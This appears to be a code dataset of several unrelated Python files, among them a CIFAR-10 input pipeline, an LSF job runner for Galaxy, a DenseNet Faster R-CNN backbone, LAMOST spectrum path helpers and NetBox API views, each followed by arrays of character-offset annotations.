min_fraction_of_examples_in_queue)
print ('Filling queue with %d CIFAR images before starting to train. '
'This will take a few minutes.' % min_queue_examples)
# Generate a batch of images and labels by building up a queue of examples.
return _generate_image_and_label_batch(float_image, read_input.label,
min_queue_examples, batch_size,
shuffle=True)
def inputs(eval_data, data_dir, batch_size):
"""Construct input for CIFAR evaluation using the Reader ops.
Args:
eval_data: bool, indicating if one should use the train or eval data set.
data_dir: Path to the CIFAR-10 data directory.
batch_size: Number of images per batch.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
"""
if not eval_data:
filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i)
for i in xrange(1, 6)]
num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
else:
filenames = [os.path.join(data_dir, 'test_batch.bin')]
num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL
for f in filenames:
if not tf.gfile.Exists(f):
raise ValueError('Failed to find file: ' + f)
# Create a queue that produces the filenames to read.
filename_queue = tf.train.string_input_producer(filenames)
# Read examples from files in the filename queue.
read_input = read_cifar10(filename_queue)
reshaped_image = tf.cast(read_input.uint8image, tf.float32)
height = IMAGE_SIZE
width = IMAGE_SIZE
# Image processing for evaluation.
# Crop the central [height, width] of the image.
resized_image = tf.image.resize_image_with_crop_or_pad(reshaped_image,
width, height)
# Subtract off the mean and divide by the variance of the pixels.
float_image = tf.image.per_image_standardization(resized_image)
# Ensure that the random shuffling has good mixing properties.
min_fraction_of_examples_in_queue = 0.4
min_queue_examples = int(num_examples_per_epoch *
min_fraction_of_examples_in_queue)
# Generate a batch of images and labels by building up a queue of examples.
if eval_data:
read_input.label.set_shape((1,))
return _generate_image_and_label_batch(float_image, read_input.label,
min_queue_examples, batch_size,
shuffle=False)
| [
[
[
774,
789
]
],
[
[
813,
821
]
],
[
[
845,
859
]
],
[
[
868,
870
],
[
5633,
5635
],
[
8224,
8226
],
[
8399,
8401
]
],
[
[
894,
900
],
[
5705,
5711
],
[
8298,
8304
]
],
[
[
945,
961
],
[
2950,
2952
],
[
3146,
3148
],
[
3167,
3169
],
[
3272,
3274
],
[
3287,
3289
],
[
3344,
3346
],
[
3510,
3512
],
[
3528,
3530
],
[
3772,
3774
],
[
4676,
4678
],
[
4933,
4935
],
[
5156,
5158
],
[
5209,
5211
],
[
5752,
5754
],
[
5900,
5902
],
[
6058,
6060
],
[
6089,
6091
],
[
6331,
6333
],
[
6445,
6447
],
[
6617,
6619
],
[
6742,
6744
],
[
6936,
6938
],
[
8536,
8538
],
[
8684,
8686
],
[
8842,
8844
],
[
8873,
8875
],
[
9036,
9038
],
[
9248,
9250
]
],
[
[
1184,
1194
],
[
6113,
6123
],
[
6134,
6144
],
[
8897,
8907
],
[
8918,
8928
]
],
[
[
1254,
1265
]
],
[
[
1271,
1303
],
[
7233,
7265
],
[
8341,
8373
]
],
[
[
1312,
1343
],
[
8470,
8501
]
],
[
[
1358,
1370
],
[
6010,
6022
],
[
8794,
8806
]
],
[
[
3832,
3863
],
[
7554,
7585
],
[
9661,
9692
]
],
[
[
5253,
5269
]
],
[
[
7751,
7757
]
]
] |
# A simple CLI runner for slurm that can be used when running Galaxy from a
# non-submit host and using a Slurm cluster.
from logging import getLogger
try:
from galaxy.model import Job
job_states = Job.states
except ImportError:
# Not in Galaxy, map Galaxy job states to Pulsar ones.
from pulsar.util import enum
job_states = enum(RUNNING='running', OK='complete', QUEUED='queued', ERROR="failed")
from ..job import BaseJobExec
log = getLogger(__name__)
argmap = {
'memory': '-M', # There is code in job_script_kwargs relying on this name's setting
'cores': '-n',
'queue': '-q',
'working_dir': '-cwd',
'project': '-P'
}
class LSF(BaseJobExec):
def __init__(self, **params):
self.params = {}
for k, v in params.items():
self.params[k] = v
def job_script_kwargs(self, ofile, efile, job_name):
scriptargs = {'-o': ofile,
'-e': efile,
'-J': job_name}
# Map arguments using argmap.
for k, v in self.params.items():
if k == 'plugin':
continue
try:
if k == 'memory':
# Memory requires both a -M limit and a -R rusage[mem=v] request
scriptargs['-R'] = "\"rusage[mem=%s]\"" % v
if not k.startswith('-'):
k = argmap[k]
scriptargs[k] = v
except Exception:
log.warning('Unrecognized long argument passed to LSF CLI plugin: %s' % k)
# Generated template.
template_scriptargs = ''
for k, v in scriptargs.items():
template_scriptargs += '#BSUB %s %s\n' % (k, v)
return dict(headers=template_scriptargs)
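# Illustrative sketch (file names and values are hypothetical): with
# params {'memory': '4096', 'cores': '2'} and a call to
# job_script_kwargs('out.log', 'err.log', 'myjob'), the generated header
# block would look roughly like
#   #BSUB -o out.log
#   #BSUB -e err.log
#   #BSUB -J myjob
#   #BSUB -R "rusage[mem=4096]"
#   #BSUB -M 4096
#   #BSUB -n 2
# (the exact ordering follows dict iteration order).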
def submit(self, script_file):
# bsub returns Job <9147983> is submitted to default queue <research-rh7>.
# This should be really handled outside with something like
# parse_external. Currently the CLI runner expects this to just send it in the last position
# of the string.
return "bsub <%s | awk '{ print $2}' | sed 's/[<>]//g'" % script_file
def delete(self, job_id):
return 'bkill %s' % job_id
def get_status(self, job_ids=None):
return "bjobs -a -o \"id stat\" -noheader" # check this
def get_single_status(self, job_id):
return "bjobs -o stat -noheader " + job_id
def parse_status(self, status, job_ids):
# Get status for each job, skipping header.
rval = {}
for line in status.splitlines():
job_id, state = line.split()
if job_id in job_ids:
# map job states to Galaxy job states.
rval[job_id] = self._get_job_state(state)
return rval
def parse_single_status(self, status, job_id):
if not status:
# Job not found in LSF, most probably finished and forgotten.
# lsf outputs: Job <num> is not found -- but that is on the stderr
# Note: a very old failed job will not be shown here either,
# which would be badly handled here. So this only works well when Galaxy
# is constantly monitoring the jobs. The logic here is that DONE jobs get forgotten
# faster than failed jobs.
log.warning("Job id '%s' not found LSF status check" % job_id)
return job_states.OK
return self._get_job_state(status)
def get_failure_reason(self, job_id):
return "bjobs -l " + job_id
def parse_failure_reason(self, reason, job_id):
# LSF will produce the following in the job output file:
# TERM_MEMLIMIT: job killed after reaching LSF memory usage limit.
# Exited with exit code 143.
for line in reason.splitlines():
if "TERM_MEMLIMIT" in line:
from galaxy.jobs import JobState
return JobState.runner_states.MEMORY_LIMIT_REACHED
return None
def _get_job_state(self, state):
# based on:
# https://www.ibm.com/support/knowledgecenter/en/SSETD4_9.1.3/lsf_admin/job_state_lsf.html
# https://www.ibm.com/support/knowledgecenter/en/SSETD4_9.1.2/lsf_command_ref/bjobs.1.html
try:
return {
'EXIT': job_states.ERROR,
'RUN': job_states.RUNNING,
'PEND': job_states.QUEUED,
'DONE': job_states.OK,
'PSUSP': job_states.ERROR,
'USUSP': job_states.ERROR,
'SSUSP': job_states.ERROR,
'UNKWN': job_states.ERROR,
'WAIT': job_states.QUEUED,
'ZOMBI': job_states.ERROR
}.get(state)
except KeyError:
raise KeyError("Failed to map LSF status code [%s] to job state." % state)
__all__ = ('LSF',)
| [
[
[
141,
150
],
[
456,
465
]
],
[
[
186,
189
],
[
207,
210
]
],
[
[
194,
204
],
[
3387,
3397
],
[
4284,
4294
],
[
4325,
4335
],
[
4369,
4379
],
[
4412,
4422
],
[
4452,
4462
],
[
4495,
4505
],
[
4538,
4548
],
[
4581,
4591
],
[
4623,
4633
],
[
4667,
4677
]
],
[
[
325,
329
],
[
347,
351
]
],
[
[
334,
344
],
[
3387,
3397
],
[
4284,
4294
],
[
4325,
4335
],
[
4369,
4379
],
[
4412,
4422
],
[
4452,
4462
],
[
4495,
4505
],
[
4538,
4548
],
[
4581,
4591
],
[
4623,
4633
],
[
4667,
4677
]
],
[
[
437,
448
],
[
676,
687
]
],
[
[
450,
453
],
[
1464,
1467
],
[
3305,
3308
]
],
[
[
477,
483
],
[
1374,
1380
]
],
[
[
672,
675
]
],
[
[
4823,
4830
]
]
] |
"""DenseNet models for Keras.
# Reference paper
- [Densely Connected Convolutional Networks]
(https://arxiv.org/abs/1608.06993) (CVPR 2017 Best Paper Award)
# Reference implementation
- [Torch DenseNets]
(https://github.com/liuzhuang13/DenseNet/blob/master/models/densenet.lua)
- [TensorNets]
(https://github.com/taehoonlee/tensornets/blob/master/tensornets/densenets.py)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from keras import backend as K
from keras.layers import Input, Add, Dense, Activation, Flatten, Convolution2D, MaxPooling2D, ZeroPadding2D, \
AveragePooling2D, TimeDistributed, BatchNormalization, Dropout
from keras import layers
from keras_frcnn.RoiPoolingConv import RoiPoolingConv
"""
couple of functions for frcnn..
"""
def get_weight_path():
return os.path.join("pretrain", 'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
def get_img_output_length(width, height):
def get_output_length(input_length):
# zero_pad
input_length += 6
# apply 4 strided convolutions
filter_sizes = [7, 3, 1, 1]
stride = 2
for filter_size in filter_sizes:
input_length = (input_length - filter_size + stride) // stride
return input_length
return get_output_length(width), get_output_length(height)
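# Worked example: for an input width of 224 the helper computes
#   224 + 6 = 230
#   (230 - 7 + 2) // 2 = 112
#   (112 - 3 + 2) // 2 = 55
#   (55 - 1 + 2) // 2 = 28
#   (28 - 1 + 2) // 2 = 14
# i.e. the base network reduces a 224-pixel side to a 14-unit feature map.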
BASE_WEIGTHS_PATH = (
'https://github.com/keras-team/keras-applications/'
'releases/download/densenet/')
DENSENET121_WEIGHT_PATH = (
BASE_WEIGTHS_PATH +
'densenet121_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET121_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET169_WEIGHT_PATH = (
BASE_WEIGTHS_PATH +
'densenet169_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET169_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet169_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET201_WEIGHT_PATH = (
BASE_WEIGTHS_PATH +
'densenet201_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET201_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet201_weights_tf_dim_ordering_tf_kernels_notop.h5')
def dense_block(x, blocks, name):
"""A dense block.
# Arguments
x: input tensor.
blocks: integer, the number of building blocks.
name: string, block label.
# Returns
output tensor for the block.
"""
for i in range(blocks):
x = conv_block(x, 32, name=name + '_block' + str(i + 1))
return x
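# Note (added for clarity): each conv_block concatenates growth_rate (32) new
# channels onto its input, so a dense block of `blocks` units increases the
# channel count by 32 * blocks.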
def transition_block(x, reduction, name):
"""A transition block.
# Arguments
x: input tensor.
reduction: float, compression rate at transition layers.
name: string, block label.
# Returns
output tensor for the block.
"""
bn_axis = 3 if K.image_data_format() == 'channels_last' else 1
x = layers.BatchNormalization(axis=bn_axis, epsilon=1.001e-5,
name=name + '_bn')(x)
x = layers.Activation('relu', name=name + '_relu')(x)
x = layers.Conv2D(int(K.int_shape(x)[bn_axis] * reduction), 1,
use_bias=False,
name=name + '_conv')(x)
x = layers.AveragePooling2D(2, strides=2, name=name + '_pool', padding='same')(x)
return x
def conv_block(x, growth_rate, name):
"""A building block for a dense block.
# Arguments
x: input tensor.
growth_rate: float, growth rate at dense layers.
name: string, block label.
# Returns
Output tensor for the block.
"""
bn_axis = 3 if K.image_data_format() == 'channels_last' else 1
x1 = layers.BatchNormalization(axis=bn_axis,
epsilon=1.001e-5,
name=name + '_0_bn')(x)
x1 = layers.Activation('relu', name=name + '_0_relu')(x1)
x1 = layers.Conv2D(4 * growth_rate, 1,
use_bias=False,
name=name + '_1_conv')(x1)
x1 = layers.BatchNormalization(axis=bn_axis, epsilon=1.001e-5,
name=name + '_1_bn')(x1)
x1 = layers.Activation('relu', name=name + '_1_relu')(x1)
x1 = layers.Conv2D(growth_rate, 3,
padding='same',
use_bias=False,
name=name + '_2_conv')(x1)
x = layers.Concatenate(axis=bn_axis, name=name + '_concat')([x, x1])
return x
def nn_base(input_tensor=None,
blocks=[6, 12, 24, 16],
include_top=False,
weights='imagenet',
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
"""Instantiates the DenseNet architecture.
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
# Arguments
blocks: numbers of building blocks for the four dense layers.
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `'channels_last'` data format)
or `(3, 224, 224)` (with `'channels_first'` data format).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 32.
E.g. `(200, 200, 3)` would be one valid value.
pooling: optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional block.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional block, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
"""
if not (weights in {'imagenet', None} or os.path.exists(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization), `imagenet` '
'(pre-training on ImageNet), '
'or the path to the weights file to be loaded.')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
if K.image_dim_ordering() == 'th':
input_shape = (3, None, None)
else:
input_shape = (None, None, 3)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
x = ZeroPadding2D((3, 3))(img_input)
x = layers.Conv2D(64, 7, strides=2, use_bias=False, name='conv1/conv')(x)
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name='conv1/bn')(x)
x = layers.Activation('relu', name='conv1/relu')(x)
# x = layers.ZeroPadding2D(padding=((1, 1), (1, 1)))(x)
x = layers.MaxPooling2D(3, strides=2, name='pool1')(x)
x = dense_block(x, blocks[0], name='conv2')
x = transition_block(x, 0.5, name='pool2')
x = dense_block(x, blocks[1], name='conv3')
x = transition_block(x, 0.5, name='pool3')
x = dense_block(x, blocks[2], name='conv4')
# here, the output size is similar to resnet50. stop here.
# x = transition_block(x, 0.5, name='pool4')
# x = dense_block(x, blocks[3], name='conv5')
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name='bn')(x)
x = layers.Activation('relu', name='relu')(x)
return x
def rpn(base_layers,num_anchors):
x = Convolution2D(512, (3, 3), padding='same', activation='relu', kernel_initializer='normal', name='rpn_conv1')(base_layers)
x_class = Convolution2D(num_anchors, (1, 1), padding="same", activation='sigmoid', kernel_initializer='uniform', name='rpn_out_class')(x)
x_regr = Convolution2D(num_anchors * 4, (1, 1), activation='linear', kernel_initializer='zero', name='rpn_out_regress')(x)
return [x_class, x_regr, base_layers]
def classifier(base_layers, input_rois, num_rois, nb_classes = 21, trainable=False):
# compile times on theano tend to be very high, so we use smaller ROI pooling regions to workaround
if K.backend() == 'tensorflow':
pooling_regions = 14
input_shape = (num_rois,14,14,1024) # densenet output channels are 1024..
elif K.backend() == 'theano':
pooling_regions = 7
input_shape = (num_rois,4096,7,7)
# from vgg version..
out_roi_pool = RoiPoolingConv(pooling_regions, num_rois)([base_layers, input_rois])
out_roi_pool = TimeDistributed(AveragePooling2D((7, 7)), name='avg_pool')(out_roi_pool)
out = TimeDistributed(Flatten(name='flatten'))(out_roi_pool)
out = TimeDistributed(Dense(4096, activation='relu', name='fc1'))(out)
out = TimeDistributed(Dropout(0.5))(out)
out = TimeDistributed(Dense(4096, activation='relu', name='fc2'))(out)
out = TimeDistributed(Dropout(0.5))(out)
out_class = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'), name='dense_class_{}'.format(nb_classes))(out)
# note: no regression target for bg class
out_regr = TimeDistributed(Dense(4 * (nb_classes-1), activation='linear', kernel_initializer='zero'), name='dense_regress_{}'.format(nb_classes))(out)
return [out_class, out_regr]
| [
[
[
415,
430
]
],
[
[
455,
463
]
],
[
[
488,
502
]
],
[
[
513,
515
],
[
890,
892
],
[
6998,
7000
]
],
[
[
535,
547
],
[
2917,
2918
],
[
3175,
3176
],
[
3709,
3710
],
[
7558,
7559
],
[
7784,
7785
],
[
7951,
7952
],
[
9702,
9703
],
[
9854,
9855
]
],
[
[
574,
579
],
[
7732,
7737
],
[
7842,
7847
]
],
[
[
581,
584
]
],
[
[
586,
591
],
[
10260,
10265
],
[
10382,
10387
],
[
10512,
10517
],
[
10706,
10711
]
],
[
[
593,
603
]
],
[
[
605,
612
],
[
10194,
10201
]
],
[
[
614,
627
],
[
9057,
9070
],
[
9196,
9209
],
[
9338,
9351
]
],
[
[
629,
641
]
],
[
[
643,
656
],
[
8047,
8060
]
],
[
[
665,
681
],
[
10110,
10126
]
],
[
[
683,
698
],
[
10094,
10109
],
[
10178,
10193
],
[
10244,
10259
],
[
10320,
10335
],
[
10366,
10381
],
[
10442,
10457
],
[
10496,
10511
],
[
10690,
10705
]
],
[
[
700,
718
]
],
[
[
720,
727
],
[
10336,
10343
],
[
10458,
10465
]
],
[
[
747,
753
],
[
2974,
2980
],
[
3098,
3104
],
[
3157,
3163
],
[
3311,
3317
],
[
3767,
3773
],
[
3931,
3937
],
[
3994,
4000
],
[
4129,
4135
],
[
4258,
4264
],
[
4321,
4327
],
[
4491,
4497
],
[
8089,
8095
],
[
8168,
8174
],
[
8265,
8271
],
[
8382,
8388
],
[
8856,
8862
],
[
8947,
8953
]
],
[
[
794,
808
],
[
9999,
10013
]
],
[
[
859,
874
]
],
[
[
981,
1002
]
],
[
[
1420,
1437
],
[
1569,
1586
],
[
1688,
1705
],
[
1806,
1823
],
[
1925,
1942
],
[
2043,
2060
],
[
2162,
2179
]
],
[
[
1536,
1559
]
],
[
[
1648,
1678
]
],
[
[
1773,
1796
]
],
[
[
1885,
1915
]
],
[
[
2010,
2033
]
],
[
[
2122,
2152
]
],
[
[
2255,
2266
],
[
8444,
8455
],
[
8541,
8552
],
[
8638,
8649
]
],
[
[
2624,
2640
],
[
8493,
8509
],
[
8590,
8606
]
],
[
[
3412,
3422
],
[
2548,
2558
]
],
[
[
4577,
4584
]
],
[
[
9016,
9019
]
],
[
[
9504,
9514
]
]
] |
'''
System of linear equations - 2
'''
a = float(input())
b = float(input())
c = float(input())
d = float(input())
e = float(input())
f = float(input())
if a == 0 and b == 0 and c == 0 and d == 0 and e == 0 and f == 0:
print(5)
elif a * d == b * c and a * f != c * e:
print(0)
elif a == 0 and b == 0 and e != 0:
print(0)
elif c == 0 and d == 0 and f != 0:
print(0)
elif a == 0 and c == 0 and b * f != d * e:
print(0)
elif b == 0 and d == 0 and a * f != c * e:
print(0)
elif a * d == b * c and a * f == c * e:
if b == 0 and d == 0:
if a != 0 and c != 0:
print(3, e / a)
elif a == 0:
if e == 0:
print(3, f / c)
elif c == 0:
if f == 0:
print(3, e / a)
elif a == 0 and c == 0:
if b != 0:
print(4, e / b)
elif d != 0:
print(4, f / d)
elif b != 0:
print(1, -a / b, e / b)
elif d != 0:
print(1, -c / d, f / d)
else:
x = (e * d - b * f) / (a * d - b * c)
y = (a * f - e * c) / (a * d - b * c)
print(2, x, y)
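# The final branch applies Cramer's rule to the system
#   a*x + b*y = e
#   c*x + d*y = f
# giving x = (e*d - b*f) / (a*d - b*c) and y = (a*f - e*c) / (a*d - b*c);
# this is safe here because the earlier branches handle every case where the
# determinant a*d - b*c is zero.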
| [
[
[
39,
40
],
[
156,
157
],
[
237,
238
],
[
256,
257
],
[
290,
291
],
[
386,
387
],
[
464,
465
],
[
498,
499
],
[
517,
518
],
[
570,
571
],
[
614,
615
],
[
630,
631
],
[
766,
767
],
[
778,
779
],
[
928,
929
],
[
1024,
1025
],
[
1048,
1049
],
[
1066,
1067
]
],
[
[
58,
59
],
[
167,
168
],
[
246,
247
],
[
301,
302
],
[
408,
409
],
[
442,
443
],
[
507,
508
],
[
540,
541
],
[
808,
809
],
[
841,
842
],
[
902,
903
],
[
932,
933
],
[
939,
940
],
[
1014,
1015
],
[
1032,
1033
],
[
1074,
1075
]
],
[
[
77,
78
],
[
178,
179
],
[
250,
251
],
[
265,
266
],
[
338,
339
],
[
397,
398
],
[
473,
474
],
[
511,
512
],
[
526,
527
],
[
581,
582
],
[
690,
691
],
[
706,
707
],
[
789,
790
],
[
977,
978
],
[
1036,
1037
],
[
1060,
1061
],
[
1078,
1079
]
],
[
[
96,
97
],
[
189,
190
],
[
241,
242
],
[
349,
350
],
[
417,
418
],
[
453,
454
],
[
502,
503
],
[
551,
552
],
[
857,
858
],
[
890,
891
],
[
951,
952
],
[
981,
982
],
[
988,
989
],
[
1010,
1011
],
[
1028,
1029
],
[
1070,
1071
]
],
[
[
115,
116
],
[
200,
201
],
[
269,
270
],
[
312,
313
],
[
421,
422
],
[
477,
478
],
[
530,
531
],
[
610,
611
],
[
653,
654
],
[
762,
763
],
[
837,
838
],
[
935,
936
],
[
1006,
1007
],
[
1056,
1057
]
],
[
[
134,
135
],
[
211,
212
],
[
260,
261
],
[
360,
361
],
[
412,
413
],
[
468,
469
],
[
521,
522
],
[
686,
687
],
[
729,
730
],
[
886,
887
],
[
984,
985
],
[
1018,
1019
],
[
1052,
1053
]
],
[
[
1001,
1002
],
[
1094,
1095
]
],
[
[
1043,
1044
],
[
1097,
1098
]
]
] |
# -*- coding: utf-8 -*-
"""
Author
------
Bo Zhang
Email
-----
bozhang@nao.cas.cn
Created on
----------
- Fri Jul 3 13:13:06 2015 read_spectrum
Modifications
-------------
- Fri Nov 20 10:16:59 2015 reformatting code
- Sun Feb 28 14:39:16 2016 migrated to bopy.spec.lamost
- Fri Jul 15 16:08:00 2016 migrate read_spectrum to read_spectrum.py
Aims
----
- generate LAMOST spectra file name/path
"""
# from __future__ import print_function
import os
import numpy as np
# from astropy.io import fits
# from astropy.table import Table, Column
def lamost_filepath(planid, mjd, spid, fiberid, dirpath="", extname=".fits"):
""" generate file path of a LAMOST spectrum
Parameters
----------
planid: string
planid
mjd: 5-digit integer
mjd (use lmjd rather than mjd for DR3 and after!)
spid: 2-digit integer
spid, the number of the spectrogragh
fiberid: 3-digit integer
fiberid
dirpath: string
the root directory for storing spectra.
Returns
--------
filepath: string
the path of root dir of directory (prefix).
if un-specified, return file name.
"""
# pre-processing: strip
if np.isscalar(planid):
planid = planid.strip()
else:
planid = [_.strip() for _ in planid]
if dirpath == "" or dirpath is None:
# return file name
if np.isscalar(mjd):
# if only input one item
return "spec-%05d-%s_sp%02d-%03d%s" \
% (mjd, planid, spid, fiberid, extname)
else:
# if input a list of items
return np.array(["spec-%05d-%s_sp%02d-%03d%s" %
(mjd[i], planid[i], spid[i], fiberid[i], extname)
for i in range(len(mjd))])
else:
# return file path
if not dirpath[-1] == os.path.sep:
dirpath += os.path.sep
if np.isscalar(mjd):
# if only input one item
return "%s%s%sspec-%05d-%s_sp%02d-%03d%s" \
% (dirpath, planid, os.path.sep,
mjd, planid, spid, fiberid, extname)
else:
# if input a list of items
return np.array(["%s%s%sspec-%05d-%s_sp%02d-%03d%s" %
(dirpath, planid[i], os.path.sep, mjd[i],
planid[i], spid[i], fiberid[i], extname)
for i in range(len(mjd))])
def _test_lamost_filepath():
"""test function **lamost_filepath**
"""
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78))
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78, "/"))
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78, "/pool"))
print(lamost_filepath("GAC_061N46_V3", 55939, 7, 78, "/pool/"))
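# For reference, the first test call above is expected to produce the file name
# 'spec-55939-GAC_061N46_V3_sp07-078.fits'; the directory-prefixed variants
# follow the same pattern with the given dirpath prepended.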
def sdss_filepath(plate, mjd, fiberid, dirpath="", extname=".fits"):
""" generate file path of a LAMOST spectrum
Parameters
----------
plate: string
plate
mjd: 5-digit integer
mjd (use lmjd rather than mjd for DR3 and after!)
fiberid: 4-digit integer
fiberid
dirpath: string
the root directory for storing spectra.
extname: string
in case that users want to synthesize other data format
Returns
--------
filepath: string
the path of root dir of directory (prefix).
if un-specified, return file name.
"""
if dirpath == "" or dirpath is None:
# return file name
if np.isscalar(mjd):
# if only input one item
return "spec-%04d-%05d-%04d%s" % (plate, mjd, fiberid, extname)
else:
# if input a list of items
return np.array(["spec-%04d-%05d-%04d%s" %
(plate[i], mjd[i], fiberid[i], extname)
for i in range(len(mjd))])
else:
# return file path
if not dirpath[-1] == os.path.sep:
dirpath += os.path.sep
if np.isscalar(mjd):
# if only input one item
return "%s%04d%sspec-%04d-%05d-%04d%s" \
% (dirpath, plate, os.path.sep,
plate, mjd, fiberid, extname)
else:
# if input a list of items
return np.array(["%s%04d%sspec-%04d-%05d-%04d%s" %
(dirpath, plate[i], os.path.sep, plate[i],
mjd[i], fiberid[i], extname)
for i in range(len(mjd))])
def _test_sdss_filepath():
print(sdss_filepath(2238, 52059, 1, "/"))
if __name__ == "__main__":
print("")
print("@Cham: start to test the module ...")
print("")
print("@Cham: testing ""lamost_filepath"" ...")
_test_lamost_filepath()
_test_sdss_filepath()
print("@Cham: OK")
| [
[
[
465,
467
],
[
1877,
1879
],
[
1913,
1915
],
[
2087,
2089
],
[
2328,
2330
],
[
3940,
3942
],
[
3976,
3978
],
[
4146,
4148
],
[
4376,
4378
]
],
[
[
475,
486
],
[
1210,
1212
],
[
1398,
1400
],
[
1634,
1636
],
[
1937,
1939
],
[
2231,
2233
],
[
3509,
3511
],
[
3712,
3714
],
[
4000,
4002
],
[
4283,
4285
]
],
[
[
565,
580
],
[
2566,
2581
],
[
2624,
2639
],
[
2687,
2702
],
[
2754,
2769
]
],
[
[
2482,
2503
],
[
4751,
4772
]
],
[
[
2818,
2831
],
[
4553,
4566
]
],
[
[
4520,
4539
],
[
4779,
4798
]
]
] |
class BaseDownsizing:
def __init__(self, raw_file_f, raw_file_r=None):
self.raw_file_f = raw_file_f
self._downsized_f = None
if raw_file_r:
self.raw_file_r = raw_file_r
self._downsized_r = None
def downsize_single(self):
"""Overridden in child classes to perform specified downsizing of fragment reads"""
return self.raw_file_f
def downsize_pair_uncompressed(self):
"""Overridden in child classes to perform specified downsizing of paired-ends reads"""
return self.raw_file_f, self.raw_file_r
def downsize_pair_gzip(self):
"""Overridden in child classes to perform specified downsizing of gzip compressed paired-ends reads"""
return self.raw_file_f, self.raw_file_r
@property
def downsized_pair_uncompressed(self):
if getattr(self, "_downsized_f", None) is None:
self._downsized_f, self._downsized_r = self.downsize_pair_uncompressed()
self.raw_file_f = self._downsized_f
self.raw_file_r = self._downsized_r
return self._downsized_f, self._downsized_r
@property
def downsized_pair_gzip(self):
if getattr(self, "_downsized_f", None) is None:
self._downsized_f, self._downsized_r = self.downsize_pair_gzip()
self.raw_file_f = self._downsized_f
self.raw_file_r = self._downsized_r
return self._downsized_f, self._downsized_r
@property
def downsized_single(self):
if getattr(self, "_downsized_f", None) is None:
self._downsized_f = self.downsize_single()
self.raw_file_f = self._downsized_f
return self._downsized_f
| [
[
[
6,
20
]
]
] |
from collections import OrderedDict
from django.conf import settings
from django.db.models import Count, F
from django.http import HttpResponseForbidden, HttpResponse
from django.shortcuts import get_object_or_404
from drf_yasg import openapi
from drf_yasg.openapi import Parameter
from drf_yasg.utils import swagger_auto_schema
from rest_framework.decorators import action
from rest_framework.mixins import ListModelMixin
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet, ViewSet
from circuits.models import Circuit
from dcim import filters
from dcim.models import (
Cable, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate, Device, DeviceBay,
DeviceBayTemplate, DeviceRole, DeviceType, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate,
Manufacturer, InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort,
PowerPortTemplate, Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site,
VirtualChassis,
)
from extras.api.serializers import RenderedGraphSerializer
from extras.api.views import CustomFieldModelViewSet
from extras.models import Graph
from ipam.models import Prefix, VLAN
from utilities.api import (
get_serializer_for_model, IsAuthenticatedOrLoginNotRequired, ModelViewSet, ServiceUnavailable,
)
from utilities.utils import get_subquery
from virtualization.models import VirtualMachine
from . import serializers
from .exceptions import MissingFilterException
# Mixins
class CableTraceMixin(object):
@action(detail=True, url_path='trace')
def trace(self, request, pk):
"""
Trace a complete cable path and return each segment as a three-tuple of (termination, cable, termination).
"""
obj = get_object_or_404(self.queryset.model, pk=pk)
# Initialize the path array
path = []
for near_end, cable, far_end in obj.trace()[0]:
# Serialize each object
serializer_a = get_serializer_for_model(near_end, prefix='Nested')
x = serializer_a(near_end, context={'request': request}).data
if cable is not None:
y = serializers.TracedCableSerializer(cable, context={'request': request}).data
else:
y = None
if far_end is not None:
serializer_b = get_serializer_for_model(far_end, prefix='Nested')
z = serializer_b(far_end, context={'request': request}).data
else:
z = None
path.append((x, y, z))
return Response(path)
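# Sketch of the response shape (illustrative): each element of `path` is a
# (termination, cable, termination) triple serialized with the Nested
# serializers, roughly
#   [[{"id": 1, ...}, {"id": 10, ...}, {"id": 2, ...}], ...]
# with None in place of a missing cable or far-end termination.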
#
# Regions
#
class RegionViewSet(ModelViewSet):
